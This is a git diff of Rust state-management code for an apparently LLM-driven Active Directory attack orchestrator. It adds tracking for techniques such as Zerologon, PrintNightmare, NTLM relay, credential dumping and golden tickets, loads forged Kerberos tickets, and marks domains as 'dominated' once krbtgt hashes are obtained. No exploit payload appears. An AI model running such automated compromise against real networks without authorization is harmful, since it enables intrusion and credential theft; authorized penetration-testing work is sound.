    /// Check if all discovered forests have been dominated (krbtgt obtained).
    ///
    /// Returns `true` when `compute_undominated_forests()` returns an empty list,
@@ -194,6 +584,16 @@ impl StateInner {
    }
}

+/// Parse a principal string of form `name` or `name@domain.fqdn`.
+/// Returns `(name, Some(domain_lower))` for the @-form, `(name, None)` for bare names.
+fn parse_principal(s: &str) -> (&str, Option<String>) {
+    if let Some((name, dom)) = s.split_once('@') {
+        (name, Some(dom.to_lowercase()))
+    } else {
+        (s, None)
+    }
+}
+
#[cfg(test)]
mod tests {
    use super::*;
@@ -246,6 +646,29 @@ mod tests {
        assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 1);
    }

+    #[test]
+    fn unmark_processed_by_prefix_removes_matching() {
+        let mut state = StateInner::new("op-1".into());
+        state.mark_processed(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:dc01".into());
+        state.mark_processed(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:dc02".into());
+        state.mark_processed(DEDUP_SECRETSDUMP, "xforest:contoso.local:dc01".into());
+        state.mark_processed(DEDUP_SECRETSDUMP, "unrelated:key".into());
+        let removed =
+            state.unmark_processed_by_prefix(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:");
+        assert_eq!(removed.len(), 2);
+        assert!(removed
+            .iter()
+            .all(|k| k.starts_with("xforest:fabrikam.local:")));
+        assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 2);
+    }
+
+    #[test]
+    fn unmark_processed_by_prefix_unknown_set_returns_empty() {
+        let mut state = StateInner::new("op-1".into());
+        let removed = state.unmark_processed_by_prefix("does_not_exist", "x:");
+        assert!(removed.is_empty());
+    }
+
    #[test]
    fn dedup_sets_are_independent() {
        let mut state = StateInner::new("op-1".into());
@@ -331,6 +754,41 @@ mod tests {
            DEDUP_ADCS_EXPLOIT,
            DEDUP_GPO_ABUSE,
            DEDUP_LAPS,
+            DEDUP_NTLM_RELAY,
+            DEDUP_NOPAC,
+            DEDUP_ZEROLOGON,
+            DEDUP_PRINTNIGHTMARE,
+            DEDUP_MSSQL_COERCION,
+            DEDUP_PASSWORD_POLICY,
+            DEDUP_GPP_SYSVOL,
+            DEDUP_NTLMV1_DOWNGRADE,
+            DEDUP_LDAP_SIGNING,
+            DEDUP_WEBDAV_DETECTION,
+            DEDUP_SPOOLER_CHECK,
+            DEDUP_MACHINE_ACCOUNT_QUOTA,
+            DEDUP_DFS_COERCION,
+            DEDUP_PETITPOTAM_UNAUTH,
+            DEDUP_WINRM_LATERAL,
+            DEDUP_GROUP_ENUMERATION,
+            DEDUP_LOCALUSER_SPRAY,
+            DEDUP_KRBRELAYUP,
+            DEDUP_SEARCHCONNECTOR,
+            DEDUP_LSASSY_DUMP,
+            DEDUP_RDP_LATERAL,
+            DEDUP_FOREIGN_GROUP_ENUM,
+            DEDUP_CERTIPY_AUTH,
+            DEDUP_SID_ENUMERATION,
+            DEDUP_DNS_ENUM,
+            DEDUP_DOMAIN_USER_ENUM,
+            DEDUP_PTH_SPRAY,
+            DEDUP_CERTIFRIED,
+            DEDUP_DACL_ABUSE,
+            DEDUP_SMBCLIENT_ENUM,
+            DEDUP_ACL_DISCOVERY,
+            DEDUP_CROSS_FOREST_ENUM,
+ DEDUP_CROSS_REALM_LATERAL, + DEDUP_GOLDEN_CERT, + DEDUP_MSSQL_RETRY, ]; assert_eq!(expected.len(), ALL_DEDUP_SETS.len()); for name in expected { @@ -430,6 +888,54 @@ mod tests { assert!(state.all_forests_dominated()); } + #[test] + fn user_quarantine_basic() { + let mut state = StateInner::new("op-1".into()); + assert!(!state.is_user_quarantined("testuser1", "contoso.local")); + + state.quarantine_user("testuser1", "contoso.local"); + assert!(state.is_user_quarantined("testuser1", "contoso.local")); + assert!(state.is_user_quarantined("TESTUSER1", "CONTOSO.LOCAL")); // case insensitive + + // Different user not affected + assert!(!state.is_user_quarantined("testuser2", "contoso.local")); + // Same user, different domain not affected + assert!(!state.is_user_quarantined("testuser1", "fabrikam.local")); + } + + #[test] + fn quarantined_users_in_domain_filters() { + let mut state = StateInner::new("op-1".into()); + state.quarantine_user("testuser1", "contoso.local"); + state.quarantine_user("testuser2", "contoso.local"); + state.quarantine_user("testuser3", "fabrikam.local"); + + let mut contoso = state.quarantined_users_in_domain("contoso.local"); + contoso.sort(); + assert_eq!( + contoso, + vec!["testuser1".to_string(), "testuser2".to_string()] + ); + + let fabrikam = state.quarantined_users_in_domain("fabrikam.local"); + assert_eq!(fabrikam, vec!["testuser3".to_string()]); + + let unknown = state.quarantined_users_in_domain("unknown.local"); + assert!(unknown.is_empty()); + } + + #[test] + fn quarantined_users_in_domain_skips_expired() { + let mut state = StateInner::new("op-1".into()); + state + .quarantined_users + .insert("expired@contoso.local".into(), Utc::now() - chrono::Duration::seconds(1)); + state.quarantine_user("fresh", "contoso.local"); + + let users = state.quarantined_users_in_domain("contoso.local"); + assert_eq!(users, vec!["fresh".to_string()]); + } + #[test] fn credential_quarantine_expired() { let mut state = StateInner::new("op-1".into()); diff --git a/ares-cli/src/orchestrator/state/mod.rs b/ares-cli/src/orchestrator/state/mod.rs index 93b8002d..34e7ee5a 100644 --- a/ares-cli/src/orchestrator/state/mod.rs +++ b/ares-cli/src/orchestrator/state/mod.rs @@ -8,12 +8,15 @@ //! arrive. Dedup sets are persisted to Redis so they survive orchestrator restarts. mod dedup; +pub mod domain_probe; mod inner; mod persistence; mod publishing; mod shared; // Re-export everything that was publicly visible from the old single file. 
+pub use dedup::MAX_EXPLOIT_FAILURES; +pub use inner::StateInner; pub use shared::SharedState; pub const DEDUP_CRACK_REQUESTS: &str = "crack_requests"; @@ -41,6 +44,44 @@ pub const DEDUP_SHARE_ENUM: &str = "share_enum"; pub const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit"; pub const DEDUP_GPO_ABUSE: &str = "gpo_abuse"; pub const DEDUP_LAPS: &str = "laps_extract"; +pub const DEDUP_NTLM_RELAY: &str = "ntlm_relay"; +pub const DEDUP_NOPAC: &str = "nopac"; +pub const DEDUP_ZEROLOGON: &str = "zerologon"; +pub const DEDUP_PRINTNIGHTMARE: &str = "printnightmare"; +pub const DEDUP_MSSQL_COERCION: &str = "mssql_coercion"; +pub const DEDUP_PASSWORD_POLICY: &str = "password_policy"; +pub const DEDUP_GPP_SYSVOL: &str = "gpp_sysvol"; +pub const DEDUP_NTLMV1_DOWNGRADE: &str = "ntlmv1_downgrade"; +pub const DEDUP_LDAP_SIGNING: &str = "ldap_signing"; +pub const DEDUP_WEBDAV_DETECTION: &str = "webdav_detection"; +pub const DEDUP_SPOOLER_CHECK: &str = "spooler_check"; +pub const DEDUP_MACHINE_ACCOUNT_QUOTA: &str = "machine_account_quota"; +pub const DEDUP_DFS_COERCION: &str = "dfs_coercion"; +pub const DEDUP_PETITPOTAM_UNAUTH: &str = "petitpotam_unauth"; +pub const DEDUP_WINRM_LATERAL: &str = "winrm_lateral"; +pub const DEDUP_GROUP_ENUMERATION: &str = "group_enumeration"; +pub const DEDUP_LOCALUSER_SPRAY: &str = "localuser_spray"; +pub const DEDUP_KRBRELAYUP: &str = "krbrelayup"; +pub const DEDUP_SEARCHCONNECTOR: &str = "searchconnector"; +pub const DEDUP_LSASSY_DUMP: &str = "lsassy_dump"; +pub const DEDUP_RDP_LATERAL: &str = "rdp_lateral"; +pub const DEDUP_FOREIGN_GROUP_ENUM: &str = "foreign_group_enum"; +pub const DEDUP_CERTIPY_AUTH: &str = "certipy_auth"; +pub const DEDUP_SID_ENUMERATION: &str = "sid_enumeration"; +pub const DEDUP_DNS_ENUM: &str = "dns_enum"; +pub const DEDUP_DOMAIN_USER_ENUM: &str = "domain_user_enum"; +pub const DEDUP_PTH_SPRAY: &str = "pth_spray"; +pub const DEDUP_CERTIFRIED: &str = "certifried"; +pub const DEDUP_DACL_ABUSE: &str = "dacl_abuse"; +pub const DEDUP_SMBCLIENT_ENUM: &str = "smbclient_enum"; +pub const DEDUP_ACL_DISCOVERY: &str = "acl_discovery"; +pub const DEDUP_CROSS_FOREST_ENUM: &str = "cross_forest_enum"; +pub const DEDUP_CROSS_REALM_LATERAL: &str = "cross_realm_lateral"; +pub const DEDUP_GOLDEN_CERT: &str = "golden_cert"; +/// Per-(vuln_id, credential) dedup for re-dispatching MSSQL exploits when +/// a new cred for the vuln's domain becomes available after the initial +/// LLM attempt failed (e.g. cred-timing race in cross-forest pivots). +pub const DEDUP_MSSQL_RETRY: &str = "mssql_retry"; /// Vuln queue ZSET key suffix. 
pub const KEY_VULN_QUEUE: &str = "vuln_queue"; @@ -74,4 +115,104 @@ const ALL_DEDUP_SETS: &[&str] = &[ DEDUP_ADCS_EXPLOIT, DEDUP_GPO_ABUSE, DEDUP_LAPS, + DEDUP_NTLM_RELAY, + DEDUP_NOPAC, + DEDUP_ZEROLOGON, + DEDUP_PRINTNIGHTMARE, + DEDUP_MSSQL_COERCION, + DEDUP_PASSWORD_POLICY, + DEDUP_GPP_SYSVOL, + DEDUP_NTLMV1_DOWNGRADE, + DEDUP_LDAP_SIGNING, + DEDUP_WEBDAV_DETECTION, + DEDUP_SPOOLER_CHECK, + DEDUP_MACHINE_ACCOUNT_QUOTA, + DEDUP_DFS_COERCION, + DEDUP_PETITPOTAM_UNAUTH, + DEDUP_WINRM_LATERAL, + DEDUP_GROUP_ENUMERATION, + DEDUP_LOCALUSER_SPRAY, + DEDUP_KRBRELAYUP, + DEDUP_SEARCHCONNECTOR, + DEDUP_LSASSY_DUMP, + DEDUP_RDP_LATERAL, + DEDUP_FOREIGN_GROUP_ENUM, + DEDUP_CERTIPY_AUTH, + DEDUP_SID_ENUMERATION, + DEDUP_DNS_ENUM, + DEDUP_DOMAIN_USER_ENUM, + DEDUP_PTH_SPRAY, + DEDUP_CERTIFRIED, + DEDUP_DACL_ABUSE, + DEDUP_SMBCLIENT_ENUM, + DEDUP_ACL_DISCOVERY, + DEDUP_CROSS_FOREST_ENUM, + DEDUP_CROSS_REALM_LATERAL, + DEDUP_GOLDEN_CERT, + DEDUP_MSSQL_RETRY, ]; + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn all_dedup_sets_are_unique() { + let mut seen = std::collections::HashSet::new(); + for name in ALL_DEDUP_SETS { + assert!(seen.insert(*name), "Duplicate dedup set name: {name}"); + } + } + + #[test] + fn new_dedup_constants_in_all_dedup_sets() { + let new_constants = [ + DEDUP_NTLM_RELAY, + DEDUP_NOPAC, + DEDUP_ZEROLOGON, + DEDUP_PRINTNIGHTMARE, + DEDUP_MSSQL_COERCION, + DEDUP_PASSWORD_POLICY, + DEDUP_GPP_SYSVOL, + DEDUP_NTLMV1_DOWNGRADE, + DEDUP_LDAP_SIGNING, + DEDUP_WEBDAV_DETECTION, + DEDUP_SPOOLER_CHECK, + DEDUP_MACHINE_ACCOUNT_QUOTA, + DEDUP_DFS_COERCION, + DEDUP_PETITPOTAM_UNAUTH, + DEDUP_WINRM_LATERAL, + DEDUP_GROUP_ENUMERATION, + DEDUP_LOCALUSER_SPRAY, + DEDUP_KRBRELAYUP, + DEDUP_SEARCHCONNECTOR, + DEDUP_LSASSY_DUMP, + DEDUP_RDP_LATERAL, + DEDUP_FOREIGN_GROUP_ENUM, + DEDUP_CERTIPY_AUTH, + DEDUP_SID_ENUMERATION, + DEDUP_DNS_ENUM, + DEDUP_DOMAIN_USER_ENUM, + DEDUP_PTH_SPRAY, + DEDUP_CERTIFRIED, + DEDUP_DACL_ABUSE, + DEDUP_SMBCLIENT_ENUM, + ]; + for c in &new_constants { + assert!( + ALL_DEDUP_SETS.contains(c), + "Dedup constant '{c}' missing from ALL_DEDUP_SETS" + ); + } + } + + #[test] + fn dedup_set_count() { + // Ensure we know how many dedup sets exist (catches accidental omissions) + assert!( + ALL_DEDUP_SETS.len() >= 45, + "Expected at least 45 dedup sets, got {}", + ALL_DEDUP_SETS.len() + ); + } +} diff --git a/ares-cli/src/orchestrator/state/persistence.rs b/ares-cli/src/orchestrator/state/persistence.rs index 2b8753be..1b085941 100644 --- a/ares-cli/src/orchestrator/state/persistence.rs +++ b/ares-cli/src/orchestrator/state/persistence.rs @@ -6,11 +6,12 @@ use anyhow::{Context, Result}; use redis::AsyncCommands; use tracing::{debug, info}; +use ares_core::models::CandidateDomain; use ares_core::state::{self, RedisStateReader}; use redis::aio::ConnectionLike; -use super::{SharedState, ALL_DEDUP_SETS, DEDUP_ACL_STEPS}; +use super::{SharedState, ALL_DEDUP_SETS, DEDUP_ACL_STEPS, DEDUP_TRUST_FOLLOW}; use crate::orchestrator::task_queue::TaskQueueCore; impl SharedState { @@ -41,6 +42,29 @@ impl SharedState { } }; + // Trust workflow dedups (`trust_follow:*` and `trust_extract:*` live in + // the same set) gate "once per op execution" decisions — forge a Kerberos + // ticket for a foreign realm, extract a trust key. They were 24h-TTL'd + // and persisted across orchestrator restarts, which meant any code-change + // requiring a re-fire had to be paired with a manual SREM. Clear them on + // load so a restart re-runs the trust path against the latest code. 
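+        // Key shape (see the tests below): ares:op:<operation_id>:dedup:trust_follow.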
+        let trust_follow_key = format!(
+            "{}:{}:{}:{}",
+            state::KEY_PREFIX,
+            operation_id,
+            state::KEY_DEDUP_PREFIX,
+            DEDUP_TRUST_FOLLOW
+        );
+        let prior_members: HashSet<String> =
+            conn.smembers(&trust_follow_key).await.unwrap_or_default();
+        if !prior_members.is_empty() {
+            let _: redis::RedisResult<()> = conn.del(&trust_follow_key).await;
+            info!(
+                cleared = prior_members.len(),
+                "Cleared trust_follow dedup on op load — trust workflow will re-fire"
+            );
+        }
+
        // Load dedup sets
        let mut dedup_sets: HashMap<String, HashSet<String>> = HashMap::new();
        for set_name in ALL_DEDUP_SETS {
@@ -103,6 +127,23 @@
            }
        }

+        let candidate_domains_key = format!(
+            "{}:{}:{}",
+            state::KEY_PREFIX,
+            operation_id,
+            state::KEY_CANDIDATE_DOMAINS
+        );
+        let raw_candidates: HashMap<String, String> = conn
+            .hgetall(&candidate_domains_key)
+            .await
+            .unwrap_or_default();
+        let mut candidate_domains = HashMap::new();
+        for (fqdn, json_str) in &raw_candidates {
+            if let Ok(candidate) = serde_json::from_str::<CandidateDomain>(json_str) {
+                candidate_domains.insert(fqdn.clone(), candidate);
+            }
+        }
+
        // Load ACL chains
        let acl_chains_key = format!(
            "{}:{}:{}",
@@ -163,6 +204,22 @@
        let dispatched_acl_steps: HashSet<String> =
            conn.smembers(&acl_dedup_key).await.unwrap_or_default();

+        // Load forged Kerberos tickets
+        let kerberos_tickets_key = format!(
+            "{}:{}:{}",
+            state::KEY_PREFIX,
+            operation_id,
+            state::KEY_KERBEROS_TICKETS
+        );
+        let raw_tickets: HashMap<String, String> = conn
+            .hgetall(&kerberos_tickets_key)
+            .await
+            .unwrap_or_default();
+        let kerberos_tickets: Vec<_> = raw_tickets
+            .into_values()
+            .filter_map(|s| serde_json::from_str(&s).ok())
+            .collect();
+
        // Apply to state
        let mut state = self.inner.write().await;
        state.target = loaded.target;
@@ -180,6 +237,7 @@
        state.domain_sids = domain_sids;
        state.admin_names = admin_names;
        state.trusted_domains = trusted_domains;
+        state.candidate_domains = candidate_domains;
        // Rebuild dominated_domains from krbtgt hashes
        state.dominated_domains = state
            .hashes
@@ -210,6 +268,22 @@
            })
            .filter(|d| !d.is_empty())
            .collect();
+        // Mirror rebuilt set to Redis so post-mortem `SCARD` stays consistent
+        // after orchestrator restart. Source of truth remains the krbtgt
+        // hashes; this is purely a visibility mirror.
+ let dominated_snapshot: Vec = state.dominated_domains.iter().cloned().collect(); + if !dominated_snapshot.is_empty() { + let dominated_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DOMINATED_DOMAINS + ); + for d in &dominated_snapshot { + let _: redis::RedisResult = conn.sadd(&dominated_key, d).await; + } + let _: redis::RedisResult = conn.expire(&dominated_key, 86400).await; + } state.has_domain_admin = loaded.has_domain_admin; state.has_golden_ticket = loaded.has_golden_ticket; state.domain_admin_path = loaded.domain_admin_path; @@ -219,6 +293,7 @@ impl SharedState { state.dispatched_acl_steps = dispatched_acl_steps; state.pending_tasks = pending_tasks; state.completed_tasks = completed_tasks; + state.kerberos_tickets = kerberos_tickets; let cred_count = state.credentials.len(); let hash_count = state.hashes.len(); @@ -317,6 +392,39 @@ impl SharedState { } } + let candidate_domains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_CANDIDATE_DOMAINS + ); + let raw_candidates: HashMap = conn + .hgetall(&candidate_domains_key) + .await + .unwrap_or_default(); + let mut candidate_domains = HashMap::new(); + for (fqdn, json_str) in &raw_candidates { + if let Ok(candidate) = serde_json::from_str::(json_str) { + candidate_domains.insert(fqdn.clone(), candidate); + } + } + + // Refresh Kerberos tickets + let kerberos_tickets_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_KERBEROS_TICKETS + ); + let raw_tickets: HashMap = conn + .hgetall(&kerberos_tickets_key) + .await + .unwrap_or_default(); + let kerberos_tickets: Vec = raw_tickets + .into_values() + .filter_map(|s| serde_json::from_str(&s).ok()) + .collect(); + let mut state = self.inner.write().await; state.credentials = credentials; state.hashes = hashes; @@ -331,7 +439,9 @@ impl SharedState { state.domain_sids = domain_sids; state.admin_names = admin_names; state.trusted_domains = trusted_domains; + state.candidate_domains = candidate_domains; state.acl_chains = acl_chains; + state.kerberos_tickets = kerberos_tickets; // Rebuild dominated_domains from refreshed hashes state.dominated_domains = state .hashes @@ -412,13 +522,15 @@ mod tests { // Seed meta so exists() returns true, then publish data seed_meta(&q, "op-1").await; + // Publish a DC host so the suffix is promoted authoritatively + // (non-DC FQDN suffixes are now held as candidates, not domains). let host = ares_core::models::Host { ip: "192.168.58.5".to_string(), - hostname: "srv01.contoso.local".to_string(), + hostname: "dc01.contoso.local".to_string(), os: String::new(), roles: vec![], services: vec!["445/tcp".to_string()], - is_dc: false, + is_dc: true, owned: false, }; state.publish_host(&q, host).await.unwrap(); @@ -469,6 +581,83 @@ mod tests { assert!(s.dedup["crack_requests"].contains("hash123")); } + #[tokio::test] + async fn load_from_redis_clears_trust_follow_dedup() { + // trust_follow / trust_extract dedups are "once per op execution" + // decisions. Persisting them across orchestrator restarts blocks + // re-firing the trust workflow after a code change. Confirm load + // clears the set so the workflow runs again on the next tick. + let state = SharedState::new("op-trust".to_string()); + let q = mock_queue(); + seed_meta(&q, "op-trust").await; + + // Other dedup sets must NOT be cleared — only trust_follow. 
+ state + .persist_dedup(&q, "trust_follow", "trust_follow:foreign.local:foreign$") + .await + .unwrap(); + state + .persist_dedup(&q, "trust_follow", "trust_extract:foreign.local") + .await + .unwrap(); + state + .persist_dedup(&q, "crack_requests", "hash-stays") + .await + .unwrap(); + + let state2 = SharedState::new("op-trust".to_string()); + state2.load_from_redis(&q).await.unwrap(); + + let s = state2.inner.read().await; + assert!( + s.dedup + .get("trust_follow") + .map(|set| set.is_empty()) + .unwrap_or(true), + "trust_follow dedup should be cleared on op load" + ); + // Sibling dedup must survive — only trust_follow gets reset. + assert!(s.dedup["crack_requests"].contains("hash-stays")); + + // And the Redis-side set should be deleted too, not just the + // in-memory copy, otherwise SADD-NX checks would still see prior keys. + let mut conn = q.connection(); + let live: HashSet = conn + .smembers("ares:op:op-trust:dedup:trust_follow") + .await + .unwrap(); + assert!(live.is_empty(), "Redis trust_follow set must be empty"); + } + + #[tokio::test] + async fn load_from_redis_restores_candidate_domains() { + let state = SharedState::new("op-candidates".to_string()); + let q = mock_queue(); + + seed_meta(&q, "op-candidates").await; + state + .publish_candidate_domain( + &q, + "transient.example.com", + ares_core::models::DomainEvidence::HostnameInference, + Some("192.168.58.50".to_string()), + ) + .await + .unwrap(); + state + .mark_candidate_probed(&q, "transient.example.com") + .await + .unwrap(); + + let state2 = SharedState::new("op-candidates".to_string()); + state2.load_from_redis(&q).await.unwrap(); + + let s = state2.inner.read().await; + let candidate = s.candidate_domains.get("transient.example.com").unwrap(); + assert!(candidate.probed); + assert_eq!(candidate.source_host_ip.as_deref(), Some("192.168.58.50")); + } + #[tokio::test] async fn refresh_from_redis_updates_state() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/credentials.rs b/ares-cli/src/orchestrator/state/publishing/credentials.rs index 5232af9f..20e8b857 100644 --- a/ares-cli/src/orchestrator/state/publishing/credentials.rs +++ b/ares-cli/src/orchestrator/state/publishing/credentials.rs @@ -10,15 +10,18 @@ use redis::aio::ConnectionLike; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; -use super::sanitize_credential; +use super::{credential_source_trust, sanitize_credential, strip_netexec_artifact}; impl SharedState { /// Add a credential to state and Redis (with dedup). /// /// Sanitizes the credential before storage (strips "Password:" prefix, trailing - /// metadata, normalizes domains, rejects noise). When the credential's domain is - /// a valid FQDN (contains a dot), it is automatically added to `state.domains` - /// (matches Python's `add_credential()` behavior). + /// metadata, normalizes domains, rejects noise). The credential's `domain` + /// field is stored as-is on the credential, but is NEVER promoted into the + /// canonical `state.domains` registry — that registry is reserved for + /// authoritative recon (LDAP root DSE, DC enumeration, trust queries) so an + /// LLM-supplied typo like `child.contossso.com` cannot pollute the + /// global view. pub async fn publish_credential( &self, queue: &TaskQueueCore, @@ -34,41 +37,68 @@ impl SharedState { None => return Ok(false), }; + // Reject phantom domain misattribution. 
Forest-wide LDAP/GC searches, + // SYSVOL script scrapes, and registry autologon dumps can surface a + // (user, password) pair under one realm while a more authoritative + // source already pinned that pair to a different realm. When the + // existing entry comes from a strictly more trustworthy source, treat + // the new entry as a misattribution. Otherwise it pollutes + // find_trust_credential and yields cross-forest LDAP bind 0x52e. + if !cred.password.is_empty() { + let new_trust = credential_source_trust(&cred.source); + let state = self.inner.read().await; + let conflict = state.credentials.iter().find(|c| { + c.username.eq_ignore_ascii_case(&cred.username) + && c.password == cred.password + && !c.domain.eq_ignore_ascii_case(&cred.domain) + }); + if let Some(existing) = conflict { + let existing_trust = credential_source_trust(&existing.source); + if existing_trust > new_trust { + tracing::warn!( + username = %cred.username, + rejected_domain = %cred.domain, + rejected_source = %cred.source, + kept_domain = %existing.domain, + kept_source = %existing.source, + "Rejecting phantom credential — same (user, password) already known under a different domain from a more trusted source" + ); + return Ok(false); + } + } + } + let operation_id = { let state = self.inner.read().await; state.operation_id.clone() }; - let reader = RedisStateReader::new(operation_id.clone()); + let reader = RedisStateReader::new(operation_id); let mut conn = queue.connection(); let added = reader.add_credential(&mut conn, &cred).await?; if added { - // Auto-extract domain from credential (matches Python add_credential) - let cred_domain = cred.domain.to_lowercase(); - if cred_domain.contains('.') { - let mut state = self.inner.write().await; - if !state.domains.contains(&cred_domain) { - state.domains.push(cred_domain.clone()); - let domain_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAINS, - ); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &cred_domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - domain = %cred_domain, - username = %cred.username, - "Auto-extracted domain from credential" - ); - } - state.credentials.push(cred); - } else { - let mut state = self.inner.write().await; - state.credentials.push(cred); + // Warn (don't promote) when the credential's domain is unknown — this + // is how we surface LLM hallucinations without letting them mutate + // canonical state. Use NetExec-artifact-stripped form for the check. + let cred_domain = strip_netexec_artifact(&cred.domain.to_lowercase()).to_string(); + let mut state = self.inner.write().await; + if cred_domain.contains('.') + && !state + .domains + .iter() + .any(|d| d.eq_ignore_ascii_case(&cred_domain)) + && !state + .domain_controllers + .keys() + .any(|d| d.eq_ignore_ascii_case(&cred_domain)) + { + tracing::warn!( + domain = %cred_domain, + username = %cred.username, + source = %cred.source, + "Credential references unknown domain — not promoting to state.domains (authoritative recon required)" + ); } + state.credentials.push(cred); } Ok(added) } @@ -81,19 +111,53 @@ impl SharedState { pub async fn publish_hash( &self, queue: &TaskQueueCore, - hash: Hash, + mut hash: Hash, ) -> Result { use ares_core::models::VulnerabilityInfo; use std::collections::HashMap; + // Canonicalize realm casing. 
AD realms are case-insensitive; storing them + // mixed-case (`CONTOSO.LOCAL` from secretsdump, `contoso.local` from + // sibling parsers) splits the same identity into two state entries and + // slips past dedup keys built with `format!("{domain}\\{user}")`. + // Mirrors the credential-side fix in `sanitize_credential`. + hash.domain = hash.domain.to_lowercase(); + let operation_id = { let state = self.inner.read().await; state.operation_id.clone() }; + let operation_id_for_redis = operation_id.clone(); let reader = RedisStateReader::new(operation_id); let mut conn = queue.connection(); let added = reader.add_hash(&mut conn, &hash).await?; - if added { + if !added { + // Upsert path: redis dedup rejected the row, but if this hash + // carries an AES256 key and the in-memory entry doesn't, mirror + // the redis upsert performed by add_hash so cross-forest forge + // gets AES on the very next 30s tick (Win2016+ rejects RC4-only + // inter-realm tickets — losing AES to dedup blocks fabrikam compromise). + if hash.aes_key.is_some() { + let mut state = self.inner.write().await; + if let Some(existing) = state.hashes.iter_mut().find(|h| { + h.username.eq_ignore_ascii_case(&hash.username) + && h.domain.eq_ignore_ascii_case(&hash.domain) + && h.hash_type.eq_ignore_ascii_case(&hash.hash_type) + && h.hash_value == hash.hash_value + }) { + if existing.aes_key.is_none() { + existing.aes_key = hash.aes_key.clone(); + tracing::info!( + username = %hash.username, + domain = %hash.domain, + "Upserted AES256 key onto existing in-memory hash entry" + ); + } + } + } + return Ok(false); + } + { let is_krbtgt = hash.username.to_lowercase() == "krbtgt" && hash.hash_type.to_lowercase().contains("ntlm"); let hash_domain = hash.domain.clone(); @@ -115,7 +179,8 @@ impl SharedState { // First pass: find a sibling whose domain matches a known DC let from_dc = state.hashes.iter().find_map(|h| { if h.parent_id.as_deref() == Some(pid) && !h.domain.is_empty() { - let d = h.domain.to_lowercase(); + let d = strip_netexec_artifact(&h.domain.to_lowercase()) + .to_string(); if state.domain_controllers.contains_key(&d) { return Some(d); } @@ -126,7 +191,10 @@ impl SharedState { from_dc.or_else(|| { state.hashes.iter().find_map(|h| { if h.parent_id.as_deref() == Some(pid) && !h.domain.is_empty() { - Some(h.domain.to_lowercase()) + Some( + strip_netexec_artifact(&h.domain.to_lowercase()) + .to_string(), + ) } else { None } @@ -135,18 +203,20 @@ impl SharedState { }) .unwrap_or_default() } else { - hash_domain.to_lowercase() + strip_netexec_artifact(&hash_domain.to_lowercase()).to_string() }; // Only mark as dominated if the domain is a known DC domain. // This prevents false domination claims from misattributed hashes // (e.g. when secretsdump output lacks a domain prefix and sibling // resolution picks up a hash from an unrelated domain). 
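            // Example of the failure mode this guards against: sibling
            // resolution attributing a krbtgt hash to `fabrikam.local` when
            // only `contoso.local` is a known DC domain must not mark
            // fabrikam dominated.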
+            let mut newly_dominated: Option<String> = None;
            if !krbtgt_domain.is_empty()
                && (state.domain_controllers.contains_key(&krbtgt_domain)
                    || state.domains.contains(&krbtgt_domain))
            {
                if state.dominated_domains.insert(krbtgt_domain.clone()) {
                    tracing::info!(domain = %krbtgt_domain, "Domain dominated (krbtgt hash obtained)");
+                    newly_dominated = Some(krbtgt_domain.clone());
                }
            } else if !krbtgt_domain.is_empty() {
                tracing::warn!(
@@ -164,19 +234,56 @@
            // Auto-set domain admin when first krbtgt NTLM hash arrives (matches Python)
            if !state.has_domain_admin {
+                let da_domain = krbtgt_domain.clone();
                drop(state);
                let path = Some("secretsdump → krbtgt NTLM hash".to_string());
-                if let Err(e) = self.set_domain_admin(queue, path).await {
+                if let Err(e) = self.set_domain_admin(queue, path.clone()).await {
                    tracing::warn!(err = %e, "Failed to auto-set domain admin from krbtgt hash");
                } else {
                    tracing::info!(
                        "🎯 Domain Admin auto-set from krbtgt NTLM hash in publish_hash"
                    );
+                    // Emit DA timeline event
+                    let techniques = vec!["T1003.006".to_string(), "T1078.002".to_string()];
+                    let event_id =
+                        format!("evt-da-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]);
+                    let event = serde_json::json!({
+                        "id": event_id,
+                        "timestamp": chrono::Utc::now().to_rfc3339(),
+                        "source": "domain_admin",
+                        "description": format!(
+                            "CRITICAL: Domain Admin achieved for {} via {}",
+                            da_domain,
+                            path.as_deref().unwrap_or("krbtgt hash")
+                        ),
+                        "mitre_techniques": techniques,
+                    });
+                    let _ = self
+                        .persist_timeline_event(queue, &event, &techniques)
+                        .await;
                }
            } else {
                drop(state);
            }
+            // Mirror in-memory `dominated_domains` to a Redis SET so
+            // post-mortem scripts (`SCARD ares:op:<op_id>:dominated_domains`)
+            // and external dashboards can observe the same view. The
+            // in-memory set is the source of truth — this is purely a
+            // visibility mirror.
+            if let Some(domain) = newly_dominated {
+                use redis::AsyncCommands;
+                let key = format!(
+                    "{}:{}:{}",
+                    state::KEY_PREFIX,
+                    operation_id_for_redis,
+                    state::KEY_DOMINATED_DOMAINS
+                );
+                let mut conn = queue.connection();
+                let _: redis::RedisResult<()> = conn.sadd(&key, &domain).await;
+                let _: redis::RedisResult<()> = conn.expire(&key, 86400).await;
+            }
+            // Synthesize a dc_secretsdump vulnerability so the discovered
            // vulnerabilities list reflects the DA achievement path.
            let vuln_id = format!("dc_secretsdump_{}", krbtgt_domain);
@@ -343,15 +450,189 @@
    }

    #[tokio::test]
-    async fn publish_credential_auto_extracts_domain() {
+    async fn publish_credential_does_not_pollute_state_domains() {
+        // LLM-supplied domains must never be promoted into the canonical
+        // `state.domains` registry — otherwise a typo like
+        // `child.contossso.com` corrupts every downstream tick loop.
        let state = SharedState::new("op-1".to_string());
        let q = mock_queue();
-        let cred = make_cred("alice", "P@ssw0rd!", "contoso.local");
+        let cred = make_cred("alice", "P@ssw0rd!", "child.contossso.com");
        state.publish_credential(&q, cred).await.unwrap();

        let s = state.inner.read().await;
